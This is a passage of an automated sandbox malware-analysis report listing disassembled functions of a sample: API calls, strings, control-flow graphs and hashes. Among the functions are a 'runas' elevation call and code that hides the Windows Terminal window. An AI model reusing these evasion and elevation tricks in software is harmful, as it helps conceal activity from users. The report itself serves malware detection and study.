                                            • Part of subcall function 6D143970: GetModuleFileNameW.KERNEL32(00000000,?,00000104,9726ABD3), ref: 6D143878
                                            • Part of subcall function 6D144A50: ShellExecuteExW.SHELL32 ref: 6D144ADB
                                            • Part of subcall function 6D144A50: WaitForSingleObject.KERNEL32(6D18C8CD,000000FF), ref: 6D144AEA
                                            • Part of subcall function 6D144A50: CloseHandle.KERNEL32(6D18C8CD), ref: 6D144AF3
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 6D144C5B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CloseProcessTokenWindow$ChangeConsoleCurrentEnumExecuteFileFindHandleInformationModuleNameNotificationObjectOpenShellShowSingleWaitWindows
                                          • String ID:
                                          • API String ID: 2167664763-0
                                          • Opcode ID: 518a9f4f4be158d1809b14a1b5f5d04932e0c69333098cef09276c09d44d2d7a
                                          • Instruction ID: 0a47d13a042307f196edbcbd37e57af5df80afa4b225ab5cc6d25cfc07f44d78
                                          • Opcode Fuzzy Hash: 518a9f4f4be158d1809b14a1b5f5d04932e0c69333098cef09276c09d44d2d7a
                                          • Instruction Fuzzy Hash: 7741AF71E10108AFDB04DFA4DD98BAEBBB8FF09711F508119F622E7684DBB49501CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167B96 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 108 6d167b96-6d167ba7 call 6d168690 111 6d167bb8-6d167bbf 108->111 112 6d167ba9-6d167baf 108->112 114 6d167bc1-6d167bc4 111->114 115 6d167bcb-6d167bdf dllmain_raw 111->115 112->111 113 6d167bb1-6d167bb3 112->113 116 6d167c91-6d167ca0 113->116 114->115 117 6d167bc6-6d167bc9 114->117 118 6d167be5-6d167bf6 dllmain_crt_dispatch 115->118 119 6d167c88-6d167c8f 115->119 120 6d167bfc-6d167c01 call 6d144dd0 117->120 118->119 118->120 119->116 122 6d167c06-6d167c0e 120->122 123 6d167c37-6d167c39 122->123 124 6d167c10-6d167c12 122->124 125 6d167c40-6d167c51 dllmain_crt_dispatch 123->125 126 6d167c3b-6d167c3e 123->126 124->123 127 6d167c14-6d167c32 call 6d144dd0 call 6d167ae6 dllmain_raw 124->127 125->119 129 6d167c53-6d167c85 dllmain_raw 125->129 126->119 126->125 127->123 129->119
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                          • String ID:
                                          • API String ID: 3136044242-0
                                          • Opcode ID: 0b62fb9dd0606ad0fcbf5c48007747620b4ac840fbd7e7cc5237beaef0440b2a
                                          • Instruction ID: 5654e3d2f19f01df9b82d9898c6623807f3e5a303e50425f9d11cf7d6aade324
                                          • Opcode Fuzzy Hash: 0b62fb9dd0606ad0fcbf5c48007747620b4ac840fbd7e7cc5237beaef0440b2a
                                          • Instruction Fuzzy Hash: 0B218071D0869BBBCB214E14D840A7F3A79ABA1BA4B024116FD1457618C7B08D61DBF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D144B70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 134 6d144b70-6d144bab GetClassNameW lstrcmpW 135 6d144bb5-6d144bc8 call 6d1675e6 134->135 136 6d144bad-6d144baf ShowWindow 134->136 136->135
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000064), ref: 6D144B91
                                          • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6D144BA3
                                          • ShowWindow.USER32(?,00000000), ref: 6D144BAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ClassNameShowWindowlstrcmp
                                          • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                          • API String ID: 3203229717-3791737310
                                          • Opcode ID: 610ce467617221a8f11636a3416b5cad2d064dcb28cc0d4b57cdfd4ca9cb19b6
                                          • Instruction ID: 3e19e7affc910179e836f1e532607612aa53f43f8b98f70189c373a7dbfffbf3
                                          • Opcode Fuzzy Hash: 610ce467617221a8f11636a3416b5cad2d064dcb28cc0d4b57cdfd4ca9cb19b6
                                          • Instruction Fuzzy Hash: 2EF0FEB5945118ABDB10DA64D908FAA77BCEB0A315F008096AA41D3140EBB49A59DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1679DF Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 6D167A2C
                                            • Part of subcall function 6D167655: InitializeSListHead.KERNEL32(6D1CB330,6D167A36,6D1A6BA8,00000010,6D1679C7,?,?,?,6D167BEF,?,00000001,?,?,00000001,?,6D1A6BF0), ref: 6D16765A
                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D167A96
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                          • String ID:
                                          • API String ID: 3231365870-0
                                          • Opcode ID: e7136859660c45e8d99226c847abbff9fab11e6726d9e0c6050b0c758673d5c1
                                          • Instruction ID: 61c1dde5aab97e913d016f25e26564d165befb1db80e993543f9ab698b58fa01
                                          • Opcode Fuzzy Hash: e7136859660c45e8d99226c847abbff9fab11e6726d9e0c6050b0c758673d5c1
                                          • Instruction Fuzzy Hash: DF215735A4C2835ADF00ABB8D4047BC77B19F1272EF29040BEB5067ACACBE14264C675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17B521 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 182 6d17b521-6d17b526 183 6d17b528-6d17b540 182->183 184 6d17b542-6d17b546 183->184 185 6d17b54e-6d17b557 183->185 184->185 186 6d17b548-6d17b54c 184->186 187 6d17b569 185->187 188 6d17b559-6d17b55c 185->188 189 6d17b5c7-6d17b5cb 186->189 192 6d17b56b-6d17b578 GetStdHandle 187->192 190 6d17b565-6d17b567 188->190 191 6d17b55e-6d17b563 188->191 189->183 193 6d17b5d1-6d17b5d4 189->193 190->192 191->192 194 6d17b587 192->194 195 6d17b57a-6d17b57c 192->195 197 6d17b589-6d17b58b 194->197 195->194 196 6d17b57e-6d17b585 GetFileType 195->196 196->197 198 6d17b58d-6d17b596 197->198 199 6d17b5a9-6d17b5bb 197->199 201 6d17b59e-6d17b5a1 198->201 202 6d17b598-6d17b59c 198->202 199->189 200 6d17b5bd-6d17b5c0 199->200 200->189 201->189 203 6d17b5a3-6d17b5a7 201->203 202->189 203->189
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 6D17B56D
                                          • GetFileType.KERNELBASE(00000000), ref: 6D17B57F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: efc9548948421436fe5ecaa680a42c7c67bc4cd61185f1e8c585dfa7f2298f71
                                          • Instruction ID: 4a8749eff70b0bdc7d3acb270d48786ba412748ca45aa660612d238180b2f190
                                          • Opcode Fuzzy Hash: efc9548948421436fe5ecaa680a42c7c67bc4cd61185f1e8c585dfa7f2298f71
                                          • Instruction Fuzzy Hash: 4811E971218B5346C7318A3E9E886367FA5AB77335F240B19E0B5C65F5C3F4D585C241
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D144DD0 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 204 6d144dd0-6d144dd7 205 6d144dee-6d144df4 204->205 206 6d144dd9-6d144de8 CreateThread 204->206 206->205
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,6D144BD0,00000000,00000000,00000000), ref: 6D144DE8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 8722b496703c1b930ea81be733b43a90fabc9be632a4b21b4220d15383d80fdf
                                          • Instruction ID: 2cfde75a3bf88e50b370de4eb33c8d361b27a64f6d5d868fd54d6361c5ba0c5e
                                          • Opcode Fuzzy Hash: 8722b496703c1b930ea81be733b43a90fabc9be632a4b21b4220d15383d80fdf
                                          • Instruction Fuzzy Hash: 91D08C343C830877F2304A916C0BF1533289725F25F30C000F7047D1C085E1B0524A1E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 6D16732C Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6D167332
                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D167340
                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D167351
                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D167362
                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D167373
                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D167384
                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6D167395
                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D1673A6
                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6D1673B7
                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D1673C8
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D1673D9
                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D1673EA
                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D1673FB
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D16740C
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D16741D
                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D16742E
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D16743F
                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D167450
                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D167461
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D167472
                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D167483
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D167494
                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D1674A5
                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 6D1674B6
                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 6D1674C7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6D1674D8
                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 6D1674E9
                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 6D1674FA
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D16750B
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D16751C
                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 6D16752D
                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 6D16753E
                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 6D16754F
                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 6D167560
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 6D167571
                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 6D167582
                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 6D167593
                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 6D1675A4
                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D1675B5
                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D1675C6
                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D1675D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                          • API String ID: 667068680-295688737
                                          • Opcode ID: 6c25abd3ae082612f6926ff0a9bdd830ac8f99de437bd8238b7573b1d464d359
                                          • Instruction ID: 7976ee0cdad5b08100fdcef3ef76d9a670dc232002e62d85e12e90f380200ce6
                                          • Opcode Fuzzy Hash: 6c25abd3ae082612f6926ff0a9bdd830ac8f99de437bd8238b7573b1d464d359
                                          • Instruction Fuzzy Hash: 2361F571812294BFCF10AFF4B94CBAA3EF9AA0F2073110616F136DA116D7F850489F58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00346810 Relevance: 87.8, APIs: 34, Strings: 16, Instructions: 281COMMON
                                          Download Yara Rule
                                          APIs
                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000020,00000001,00000000), ref: 00346871
                                          • GetCurrentProcess.KERNEL32(?), ref: 0034689B
                                          • GetCurrentProcess.KERNEL32 ref: 003468A3
                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000002), ref: 003468B8
                                          • GetLastError.KERNEL32 ref: 003468C2
                                          • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00346B44
                                          • DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00346B54
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00346B76
                                          • UnloadUserProfile.USERENV(?,?,?,00000000), ref: 00346B91
                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00346BA1
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001), ref: 00346BAF
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                          • GetLastError.KERNEL32 ref: 00346BCE
                                            • Part of subcall function 00342700: Warning.VMWAREBASE(?,00001000,?,00346E9C,?,00346E9C,RevertToSelf failed: %d,00000000), ref: 0034273F
                                          Strings
                                          • The system environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 003469EF
                                          • GetEnvironmentStrings() failed: %d, xrefs: 003469BC
                                          • DuplicateHandle failed: %d, xrefs: 003468C9
                                          • CreateEnvironmentBlock(NULL) failed: %d, xrefs: 00346A0A
                                          • P<kv, xrefs: 0034697A, 00346B76, 00346BAF
                                          • CreateLogonSession: spawn with username: %s, xrefs: 0034696F
                                          • GetUserName failed: %d, xrefs: 00346948
                                          • , xrefs: 003468E3
                                          • Your environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00346A6E
                                          • CreateEnvironmentBlock(hToken) failed: %d, xrefs: 00346A86
                                          • ImpersonateLoggedOnUser failed: %d, xrefs: 00346905
                                          • is NOT, xrefs: 00346988
                                          • calloc failed, xrefs: 00346880
                                          • (Account %s administrator), xrefs: 00346996
                                          • LoadUserProfile failed: %d, xrefs: 00346A37
                                          • RevertToSelf failed: %d, xrefs: 00346BD5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$Warning$BlockCurrentDestroyEnvironmentHandleProcessfree$CloseDuplicateProfileUnloadUser_printfcalloc
                                          • String ID: $ (Account %s administrator)$CreateEnvironmentBlock(NULL) failed: %d$CreateEnvironmentBlock(hToken) failed: %d$CreateLogonSession: spawn with username: %s$DuplicateHandle failed: %d$GetEnvironmentStrings() failed: %d$GetUserName failed: %d$ImpersonateLoggedOnUser failed: %d$LoadUserProfile failed: %d$P<kv$RevertToSelf failed: %d$The system environment block appears to be corrupted. Please fix your environment block and try again.$Your environment block appears to be corrupted. Please fix your environment block and try again.$calloc failed$is NOT
                                          • API String ID: 943474365-3262040921
                                          • Opcode ID: 29f07d30116223110a6b1f15e4c5f1a76706414c42ebfa06c77b39547df5ea71
                                          • Instruction ID: fc1ff84b52729cee7f58e382615cf0633d7722e0ca1f3ea15336cef641d73c5b
                                          • Opcode Fuzzy Hash: 29f07d30116223110a6b1f15e4c5f1a76706414c42ebfa06c77b39547df5ea71
                                          • Instruction Fuzzy Hash: 62A1C475A402149BDB226F619C4ABAA77ECFF06704F048194F945EE192EF70BD44CBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D151910 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 123encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,9726ABD3,?,00000000,6D144435), ref: 6D151955
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,6D18D77D,000000FF,?,6D151FA0), ref: 6D15195B
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6D15196F
                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6D151980
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,6D18D77D,000000FF), ref: 6D1519A5
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D151A22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: AcquireContextCrypt$ErrorLast$___std_exception_copy
                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                          • API String ID: 616088579-1159690233
                                          • Opcode ID: 34a95401055a6c80c92031602b972ced795c881630fdaebaf408aac1a387f77a
                                          • Instruction ID: 0d50198ad989302bdd9d26330841016eee5c657bb06eaf6c11656c8eb8657e93
                                          • Opcode Fuzzy Hash: 34a95401055a6c80c92031602b972ced795c881630fdaebaf408aac1a387f77a
                                          • Instruction Fuzzy Hash: AC41B2B2904649AFC710DF95CC44FAAB7BCEB49714F10462AF911E7284EBF4A504CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

